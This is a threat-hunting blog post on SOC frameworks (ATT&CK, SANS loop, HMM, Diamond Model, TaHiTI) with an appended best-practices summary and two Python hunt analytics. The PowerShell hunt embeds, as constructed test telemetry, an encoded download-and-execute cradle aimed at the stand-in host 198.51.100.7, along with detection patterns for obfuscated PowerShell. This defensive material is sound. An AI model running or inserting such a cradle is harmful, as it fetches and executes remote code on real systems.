Full Report
Threat hunting has become one of the most important activities in modern security operations. In an age where adversaries innovate constantly, waiting for alerts is not enough. A mature SOC must be proactive: searching for adversaries before they trigger alarms, and validating whether defences actually hold up against real-world tactics.

Threat-informed defence is the philosophy that underpins this approach. Instead of hunting on hunches or generic indicators, teams use structured frameworks that tie hunts to adversary behaviour. This post explores why threat hunting matters, the major frameworks you can adopt, what makes a hunt successful, and common pitfalls to avoid.

## Why Threat Hunting Matters

- **Attackers move faster than defenders:** Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, the damage may already be done. Hunting helps you catch these subtler intrusions earlier.
- **Detection gaps are inevitable:** No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.
- **SOC maturity and analyst skill growth:** Hunting develops analyst expertise, strengthens defensive posture, and moves the SOC from reactive firefighting to proactive security.

## The Main Threat Hunting Frameworks

Different organisations have proposed structured methodologies for threat hunting. Here are the most prominent.

### MITRE ATT&CK®-Driven Hunting

The MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn't just tell you what attackers do: each technique entry also lists the data sources and detection notes that point to how you can find it.

A typical ATT&CK-driven hunting process follows these steps:

1. **Select relevant tactics and techniques:** Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques under the Execution and Impact tactics.
2. **Form a hypothesis:** Translate the chosen technique into a testable hypothesis. For instance: "An adversary may be using PowerShell (T1059.001, Command and Scripting Interpreter: PowerShell) for execution in our environment."
3. **Map to available data sources:** Use the data sources listed on the ATT&CK technique page to determine what telemetry you need. For PowerShell execution this means process creation events with command lines (Sysmon Event ID 1 or Windows Security 4688), PowerShell script block logging (Microsoft-Windows-PowerShell/Operational Event ID 4104), or EDR telemetry. If that telemetry is not being collected, that is itself a finding.
4. **Hunt in the environment:** Build queries in your SIEM or EDR to test the hypothesis. Look for activity matching the technique, such as unusual PowerShell command lines: encoded commands, hidden windows, download cradles, or PowerShell spawned by Office applications.
5. **Investigate and enrich:** If suspicious activity is found, add context: when did it occur, which accounts and hosts were involved, what was the parent process, and is it tied to known adversary campaigns?
6. **Operationalise findings:** Feed validated findings back into your detection engineering process, for example by creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.
7. **Measure coverage:** Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time this builds a measurable "ATT&CK coverage map" of your environment.

### SANS Threat Hunting Process (The Hunting Loop)

The SANS Institute's Threat Hunting Loop provides a structured, repeatable process for hunts. It is intelligence-driven, but its defined stages make it more than simply consuming threat intel.
The loop consists of:

1. **Hypothesis generation:** Start with a question based on threat intelligence or observed activity.
2. **Profiling the environment:** Establish baselines of normal behaviour so that anomalies stand out.
3. **Hunting:** Actively test the hypothesis by querying the available data sources.
4. **Discovery and enrichment:** Investigate findings, correlate with other data, and gather context.
5. **Operationalisation:** Feed discoveries back into detections, dashboards, or playbooks to strengthen defences.

This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.

### Hunting Maturity Model (HMM)

The Hunting Maturity Model (HMM) was developed by David Bianco at Sqrrl, the threat hunting vendor acquired by Amazon in 2018. It rates a hunting programme on the quality of the data it collects, the tools and techniques it uses, and how far analysts create and automate their own procedures, across five levels:

- **HM0 (Initial):** No hunting; the SOC relies on automated alerting and reacts to it.
- **HM1 (Minimal):** Ad hoc searches driven by indicators from threat intelligence reports.
- **HM2 (Procedural):** Structured, repeatable hunts that follow procedures created by others.
- **HM3 (Innovative):** Analysts create their own hunting procedures.
- **HM4 (Leading):** Successful procedures are automated so that analyst time goes to new hunts.

This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.

### Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)

- **Diamond Model of Intrusion Analysis:** Describes every intrusion event through four vertices, adversary, capability, infrastructure, and victim, and the relationships between them. Analysts can pivot across these vertices (for example, from a piece of infrastructure to the capabilities seen with it) to generate hypotheses and better understand adversary behaviour.
- **Cyber Kill Chain® (Lockheed Martin):** Breaks an intrusion into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: "At which phase are we most likely to detect this activity in our environment?"

While neither is a catalogue of TTPs in the way MITRE ATT&CK is, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.

### TaHiTI Methodology

Some SOC teams adopt TaHiTI (Targeted Hunting integrating Threat Intelligence), a hunting methodology published by the Dutch financial sector's FI-ISAC in 2018. It runs each hunt through three phases, initiate, hunt, and finalise, with threat intelligence feeding every step. Lighter-weight, iterative hunting styles inspired by it emphasise:

- Short cycles of hypothesis and testing
- Rapid feedback into detections
- Flexibility over rigid process

This style suits agile teams that want fast results without the overhead of a heavier formal framework.

## What Makes Threat Hunting Successful

- **Clear hypotheses:** Hunts should start with a focused, testable question (e.g., "Are adversaries using living-off-the-land binaries to move laterally in our network?").
- **Threat intelligence integration:** Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.
- **Data coverage and visibility:** Hunts are only as strong as the telemetry available; endpoint, network, cloud, and identity data must be ingested and searchable.
- **Repeatability and documentation:** Each hunt should produce lessons learned, new detections, and playbooks for future use.
- **Feedback loop to detection engineering:** Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.

## Common Pitfalls to Avoid

- **Unstructured "fishing expeditions":** Hunting without hypotheses wastes time and erodes analyst confidence.
- **Over-reliance on tools alone:** Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.
- **Failure to operationalise results:** If hunts don't improve detection coverage or incident response, they are wasted effort.
- **Not measuring value:** Without metrics such as detection coverage improvements, dwell time reduction, or the rate of validated hypotheses, executive buy-in may fade.
- **Burnout and scope creep:** Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.

## Bringing It All Together: Threat-Informed Defence

Threat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.

In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the SANS Hunting Loop aren't academic exercises; they are the scaffolding that keeps your defence programme anchored to reality.

Where threat hunting fits:

- Threat hunting becomes the validation engine for threat-informed defence.
- By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.
- Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.
- Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.

Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.

## The Role of Cyber Threat Intelligence in Threat Hunting

Threat hunting is only as strong as the intelligence it's built on. Too often, "threat intelligence" is treated as a feed of indicators of compromise (IOCs): IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting. By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment. Hunting on these alone quickly becomes a game of whack-a-mole.

Real threat hunting requires intelligence that answers bigger questions:

- **Which threat actors are likely to target my industry and geography?** Understanding the adversaries most relevant to your organisation ensures you're not chasing ghosts but focusing on real risks.
- **Which techniques do those adversaries use?** Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you'll need.
- **When were those techniques and campaigns active?** Bounding intelligence in time matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.

Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.

Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence. Reach out to us for more details.

## Final Thoughts

Threat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures. Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.

These insights are not abstract theory; they're the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today's adversaries.
Analysis Summary
# Best Practices: Implementing Proactive Threat Hunting for SOC Maturity
## Overview
These practices focus on transitioning Security Operations Centers (SOCs) from purely reactive alert handling to proactive security operations through structured threat hunting. This shift, underpinned by the philosophy of "threat-informed defence," aims to uncover latent threats, validate existing defenses against real-world adversary tactics, techniques, and procedures (TTPs), and systematically reduce detection gaps.
## Key Recommendations
### Immediate Actions
1. **Establish Threat Hunting as an Official SOC Function:** Dedicate time and resources explicitly for threat hunting activities, moving beyond treating it as an 'optional' task.
2. **Adopt a Structured Framework:** Immediately select a recognized framework (e.g., MITRE ATT&CK, SANS Hunting Loop) to structure the first few hunting cycles, avoiding ad-hoc activities.
3. **Baseline Normal Operations:** Begin profiling current environment telemetry (e.g., process execution, network flows) to establish initial benchmarks for anomaly detection.
### Short-term Improvements (1-3 months)
1. **Implement MITRE ATT&CK-Driven Scoping:** Select high-priority tactics/techniques relevant to your industry/geography (based on threat intelligence) and use them as the foundation for initial hypotheses.
2. **Develop Initial Hypothesis Templates:** For selected ATT&CK techniques (e.g., T1059.001 - PowerShell Execution), create repeatable templates for hypothesis generation, data source mapping, and query construction.
3. **Operationalize First Successful Hunts:** For any validated findings (new threat activity or detection gaps), immediately create or tune SIEM rules, EDR detections, or SOAR playbooks mapped directly to the identified technique.
4. **Implement Initial Maturity Assessment:** Use the Hunting Maturity Model (HMM) to benchmark the current SOC state; moving from HM0/HM1 (reactive alerting, ad hoc indicator searches) to HM2 (Procedural: structured, repeatable hunts) is the immediate goal.
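As a worked example of the hypothesis template above and of the ATT&CK-driven process described in the Full Report (hypothesis, data source mapping, hunt, enrichment, operationalisation, coverage), here is a hunt analytic for T1059.001 in Python. This is an added example, not code from the original post or from Arachne Digital. The process-creation events, host and user names, the `198.51.100.7` address, the `ccmexec.exe` allowlist and the indicator weights are all constructed for the illustration; the event field layout is modelled on Sysmon Event ID 1 / Security 4688 but is an assumption, not a real log format.

```python
"""Hunt for ATT&CK T1059.001 (PowerShell) over constructed process-creation telemetry.
Added example, not from the original post. Hypothesis: "An adversary is using encoded
or obfuscated PowerShell for execution." Data source: Sysmon Event ID 1 / Security 4688."""
import base64
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

TECHNIQUE = "T1059.001"
# base64(UTF-16LE) is what PowerShell expects after -EncodedCommand.
ENC_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')".encode("utf-16le")).decode()

# Constructed events; field layout is an assumption modelled on Sysmon ID 1. The second
# record is the attacker case: Word spawning hidden, encoded PowerShell with a download cradle.
EVENTS = [
    {"ts": "2024-05-01T09:12:04Z", "host": "WS-0142", "user": "CORP\\j.doe", "parent": "explorer.exe",
     "image": "powershell.exe", "cmd": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"ts": "2024-05-01T09:13:30Z", "host": "WS-0142", "user": "CORP\\j.doe", "parent": "WINWORD.EXE",
     "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc " + ENC_BLOB},
    {"ts": "2024-05-01T09:20:11Z", "host": "SRV-SCCM01", "user": "NT AUTHORITY\\SYSTEM", "parent": "CcmExec.exe",
     "image": "powershell.exe", "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\sccm\\patch.ps1"},
    {"ts": "2024-05-01T10:02:45Z", "host": "WS-0077", "user": "CORP\\a.smith", "parent": "cmd.exe",
     "image": "powershell.exe", "cmd": "powershell.exe -c \"$a='Inv'+'oke-Ex'+'pression'; & $a (gc .\\x.txt)\""},
]

# Detection logic for the hypothesis; weights, threshold and allowlist are analyst judgement.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(?:p|xec|xecutionpolicy)?\s+bypass", re.I)
CONCAT = re.compile(r"'[^']{1,8}'\s*\+\s*'[^']{1,8}'")  # 'Inv'+'oke' string splitting
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ADMIN_PARENTS = {"ccmexec.exe"}  # constructed allowlist learned while profiling the environment
WEIGHTS = {"encoded command": 2, "download cradle": 3, "hidden window": 1, "execution policy bypass": 1,
           "string-splitting obfuscation": 2, "spawned by Office application": 3}
THRESHOLD = 2


@dataclass
class Finding:
    technique: str
    ts: str
    host: str
    user: str
    score: int
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    enrichment: dict = field(default_factory=dict)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> Optional[Finding]:
    """Test one process-creation event against the hypothesis."""
    if ev["image"].lower() != "powershell.exe":
        return None
    cmd, parent = ev["cmd"], ev["parent"].lower()
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + (decoded or "")  # match on the decoded payload as well
    checks = [("encoded command", decoded is not None),
              ("download cradle", bool(CRADLE.search(text))),
              ("hidden window", bool(HIDDEN.search(cmd))),
              ("execution policy bypass", bool(BYPASS.search(cmd))),
              ("string-splitting obfuscation", bool(CONCAT.search(text))),
              ("spawned by Office application", parent in OFFICE_PARENTS)]
    reasons = [name for name, hit in checks if hit]
    score = sum(WEIGHTS[r] for r in reasons)
    # Tuning: known admin tooling keeps its score only with the strong indicators an attacker needs.
    if parent in ADMIN_PARENTS and not {"encoded command", "download cradle"} & set(reasons):
        score = 0
    if score < THRESHOLD:
        return None
    return Finding(TECHNIQUE, ev["ts"], ev["host"], ev["user"], score, reasons, decoded)


def run_hunt(events: List[dict]) -> dict:
    """Hunt, enrich, and emit the coverage record detection engineering needs."""
    findings = [f for f in map(score_event, events) if f is not None]
    ps_by_user = Counter(e["user"] for e in events if e["image"].lower() == "powershell.exe")
    for f in findings:  # context an analyst wants before escalating
        f.enrichment = {"powershell_launches_by_user": ps_by_user[f.user],
                        "hosts_for_user": sorted({e["host"] for e in events if e["user"] == f.user})}
    findings.sort(key=lambda f: f.score, reverse=True)
    coverage = {"technique": TECHNIQUE, "data_sources": ["Process: Process Creation"],
                "events_reviewed": len(events), "findings": len(findings),
                "to_operationalise": "score_event() logic as a SIEM/EDR rule"}
    return {"findings": findings, "coverage": coverage}


if __name__ == "__main__":
    for f in run_hunt(EVENTS)["findings"]:
        print(f"[{f.technique}] {f.ts} {f.host} {f.user} score={f.score} {f.reasons} {f.enrichment}")
        if f.decoded:
            print("   decoded:", f.decoded)
```

Running the block reports two findings: the Word-spawned hidden, encoded download cradle scores highest and carries the decoded script, and the string-splitting command on WS-0077 scores just above the threshold. The SCCM patch job stays quiet because of the allowlist; that tuning step, driven by what profiling the environment showed, is exactly what should happen before `score_event()` becomes a SIEM or EDR rule, and the `coverage` record is what goes onto the ATT&CK coverage map.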
### Long-term Strategy (3+ months)
1. **Integrate Real-Time Threat Intelligence:** Shift "threat intelligence" consumption from solely relying on potentially obsolete Indicators of Compromise (IOCs) to intelligence focused on *which threat actors are targeting your industry* and *which techniques they employ*.
2. **Establish Continuous Coverage Measurement:** Systematically document and track which ATT&CK techniques have corresponding detections/controls, visualizing the organization's current "ATT&CK coverage map" to prioritize gap remediation.
3. **Automate Triage and Enrichment:** Evolve toward HM3 (Innovative) and HM4 (Leading) on the HMM by integrating automated enrichment into the investigation phase of the hunting loop (e.g., automatically correlating findings with vulnerability data or internal asset context) and by automating hunt procedures once they have proven themselves.
4. **Develop Adversary Simulation (Purple Teaming):** Schedule regular engagements where threat hunting hypotheses are tested against live systems using known adversary TTPs to validate real-world defense effectiveness.
## Implementation Guidance
### For Small Organizations
- **Start Simple with SANS Loop:** Utilize the SANS Hunting Loop as it integrates naturally with existing intelligence feeds and focuses on a repeatable process without requiring extensive internal framework mapping initially.
- **Focus on High-Fidelity Telemetry:** Prioritize hunting on endpoints (EDR/Sysmon, with command-line logging enabled) and essential identity logs (Active Directory domain controller security logs, Microsoft Entra ID sign-in logs), as these provide the highest return on investment for initial hunts.
- **Leverage Existing Tooling:** Frame hypothesis testing queries directly within your existing SIEM or EDR solutions; avoid investing in new specialized threat hunting platforms initially.
### For Medium Organizations
- **Mandate ATT&CK Mapping:** Adopt the MITRE ATT&CK framework as the primary organizational standard for mapping hunts to adversary behaviour.
- **Formalize the Feedback Loop:** Designate a role or a recurring meeting to ensure that validated findings flow directly to the Detection Engineering team for formalizing new security controls.
- **Begin Profiling Baselines:** Dedicate time to build definitive baselines for critical systems (e.g., domain controllers, primary web servers) to improve the ‘Profiling the Environment’ stage of the hunting loop.
### For Large Enterprises
- **Horizontal and Vertical Coverage:** Ensure hunts cover techniques across multiple security domains (Endpoint, Cloud, Network, Identity), guided by both strategic CTI (which actors target your industry and geography) and tactical/technical CTI (which TTPs they use).
- **Implement HMM Progression:** Actively manage the transition from HM2 (Procedural) to HM3 (Innovative) by allocating R&D time for analysts to develop novel hunting procedures and detection techniques not covered by standard alerts.
- **Integrate Analytic Models:** Use the Diamond Model for deep-dive anomaly investigation to pivot hypotheses based on identified infrastructure or adversary capabilities, moving beyond simple TTP identification.
## Configuration Examples
*No specific technical configurations were provided in the source text. Below are conceptual mappings based on the methodology:*
| Hypothesis Example (ATT&CK Driven) | Data Source Focus | Detection Logic Target |
| :--- | :--- | :--- |
| An adversary is executing encoded or obfuscated PowerShell (T1059.001, Command and Scripting Interpreter: PowerShell). | Process creation with command line (Sysmon Event ID 1 / Security 4688) and PowerShell script block logging (Microsoft-Windows-PowerShell/Operational Event ID 4104; module logging 4103) | Command lines with `-EncodedCommand`/`-enc`, hidden-window or execution-policy-bypass flags, download cradles, string-splitting obfuscation, or PowerShell spawned by Office applications; decode the base64 (UTF-16LE) payload before matching. |
| An adversary is moving laterally over RDP or SMB (T1021.001 / T1021.002, Remote Services). | Security Event ID 4624 logons (type 10 RemoteInteractive for RDP, type 3 Network for SMB), Sysmon Event ID 3 network connections to 3389/445, and a profiled baseline of which accounts normally reach which hosts | Logons that break the baseline: first-seen user-to-host pairs, workstation-to-workstation RDP, unfamiliar source addresses, or one account fanning out to several new hosts in a short window. |
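The second row of the table as a runnable example, which also exercises the "Profiling the Environment" stage of the hunting loop: the Python below (an added example, not code from the original post or from Arachne Digital) builds a baseline of which accounts RDP to which hosts from which source addresses, then scores hunt-window logons that break that profile. The logon records, host names, the `10.10.20.0/24` workstation subnet, the hunt window date and the scoring weights are constructed; the record fields follow Security Event ID 4624 (logon type 10 = RemoteInteractive) but the layout is an assumption.

```python
"""Hunt for ATT&CK T1021.001 (Remote Services: Remote Desktop Protocol).
Added example, not from the original post. Profiles normal RDP usage from a
baseline window, then scores hunt-window logons that break the profile.
Records, hosts, users, the subnet and the weights are constructed."""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import date
from ipaddress import ip_address, ip_network
from typing import Dict, List, Set

TECHNIQUE = "T1021.001"
WORKSTATION_NET = ip_network("10.10.20.0/24")  # constructed client subnet
HUNT_START = date(2024, 5, 1)                  # records before this form the baseline
FANOUT = 3                                     # new hosts per account that looks like lateral movement


def rec(day: str, host: str, user: str, src: str, logon_type: int = 10) -> dict:
    """Minimal Security 4624 record; logon type 10 is RemoteInteractive (RDP)."""
    return {"date": date.fromisoformat(day), "host": host, "user": user,
            "src": src, "logon_type": logon_type}


# Constructed logons. j.doe never RDPs anywhere in the baseline, then reaches two
# workstations and a file server from a single workstation in one day.
LOGONS = [
    rec("2024-04-17", "SRV-FILE01", "CORP\\it.admin", "10.10.50.5"),
    rec("2024-04-22", "SRV-DC01",   "CORP\\it.admin", "10.10.50.5"),
    rec("2024-04-29", "SRV-FILE01", "CORP\\it.admin", "10.10.50.5"),
    rec("2024-04-18", "SRV-APP02",  "CORP\\a.smith",  "10.10.20.77"),
    rec("2024-04-25", "SRV-APP02",  "CORP\\a.smith",  "10.10.20.77"),
    rec("2024-04-25", "WS-0142",    "CORP\\j.doe",    "10.10.20.15", logon_type=2),  # console, not RDP
    rec("2024-05-01", "SRV-FILE01", "CORP\\it.admin", "10.10.50.5"),
    rec("2024-05-01", "SRV-APP03",  "CORP\\a.smith",  "10.10.20.77"),
    rec("2024-05-01", "WS-0077",    "CORP\\j.doe",    "10.10.20.15"),
    rec("2024-05-01", "WS-0103",    "CORP\\j.doe",    "10.10.20.15"),
    rec("2024-05-01", "SRV-FILE01", "CORP\\j.doe",    "10.10.20.15"),
]


def rdp_events(events: List[dict], baseline: bool):
    """Yield RDP logons from either the baseline window or the hunt window."""
    for e in events:
        if e["logon_type"] == 10 and (e["date"] < HUNT_START) == baseline:
            yield e


def profile(events: List[dict]):
    """'Profiling the environment': hosts and source IPs each account normally uses."""
    hosts: Dict[str, Set[str]] = defaultdict(set)
    srcs: Dict[str, Set[str]] = defaultdict(set)
    for e in rdp_events(events, baseline=True):
        hosts[e["user"]].add(e["host"])
        srcs[e["user"]].add(e["src"])
    return hosts, srcs


@dataclass
class UserFinding:
    technique: str
    user: str
    score: int = 0
    new_hosts: List[str] = field(default_factory=list)
    seen_srcs: Set[str] = field(default_factory=set)
    reasons: List[str] = field(default_factory=list)


def hunt(events: List[dict]) -> List[UserFinding]:
    """Score hunt-window RDP logons against the profile; one finding per account."""
    hosts, srcs = profile(events)
    findings: Dict[str, UserFinding] = {}
    for e in rdp_events(events, baseline=False):
        u, host, src = e["user"], e["host"], e["src"]
        if host in hosts[u] and src in srcs[u]:
            continue  # matches the baseline, nothing to chase
        f = findings.setdefault(u, UserFinding(TECHNIQUE, u))
        if host not in hosts[u]:
            f.new_hosts.append(host)
            f.score += 1
            f.reasons.append(f"first RDP to {host}")
        if src not in srcs[u] and src not in f.seen_srcs:
            f.seen_srcs.add(src)
            f.score += 1
            f.reasons.append(f"unseen source {src}")
        if host.startswith("WS-") and ip_address(src) in WORKSTATION_NET:
            f.score += 2
            f.reasons.append(f"workstation-to-workstation RDP {src} -> {host}")
    for f in findings.values():  # account-level signals
        if not hosts[f.user]:
            f.score += 2
            f.reasons.append("no RDP history for this account in the baseline")
        if len(f.new_hosts) >= FANOUT:
            f.score += 3
            f.reasons.append(f"fan-out to {len(f.new_hosts)} new hosts in one window")
    return sorted(findings.values(), key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in hunt(LOGONS):
        print(f"[{f.technique}] {f.user} score={f.score}")
        for r in f.reasons:
            print("   -", r)
```

The baseline is what keeps this quiet: `it.admin` reaching the file server from the usual jump host produces nothing, `a.smith` reaching one new server from a known source scores 1, and `j.doe` scores highest because every signal stacks (no RDP history, workstation-to-workstation hops, and fan-out to three new hosts). In production the baseline window should be weeks, not days, and the profile should be rebuilt on a schedule so that legitimate new access patterns age into it.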
## Compliance Alignment
- **NIST SP 800-150 (Guide to Cyber Threat Information Sharing):** Guidance on integrating cyber threat information into defensive operations and sharing it with peers.
- **MITRE ATT&CK®:** The core framework driving the selection, structuring, and measurement of hunting activities.
- **ISO/IEC 27001:2022 (Annex A control 5.7, Threat intelligence):** Collecting and analysing threat intelligence specific to the organization to inform risk assessment and continuous monitoring activities.
- **Hunting Maturity Model (HMM):** Used for self-assessing and charting the maturity of the hunting function.
## Common Pitfalls to Avoid
- **Chasing "Whack-a-Mole" IOCs:** Do not base hunts solely on static, non-contextual IOC feeds; this is reactive and quickly outdated. Focus on tactics and techniques.
- **Lack of Structure:** Avoid conducting hunts based only on intuition or hunches. Every hunt must start with a defined hypothesis anchored to a relevant adversary profile or known detection gap.
- **No Feedback Loop:** Failing to operationalize successful findings results in wasted effort. Ensure every discovery leads directly to an improvement in automated detections or defensive posture documentation.
- **Neglecting Contextual Intelligence:** Ignoring industry relevance. Do not waste resources hunting for techniques used by actors irrelevant to your industry or geography.
## Resources
- **MITRE ATT&CK Framework:** The primary reference for adversary TTPs and associated data sources.
- **SANS Threat Hunting Loop Documentation:** Provides detailed methodology for repeatable hunting cycles.
- **Hunting Maturity Model (HMM):** Used for benchmarking and charting SOC evolution across HM0 to HM4.
- **Diamond Model for Intrusion Analysis:** Useful for structuring deep investigations around identified events.
- **Cyber Kill Chain® (Lockheed Martin):** Provides a phased approach to framing detection opportunities across the attack lifecycle.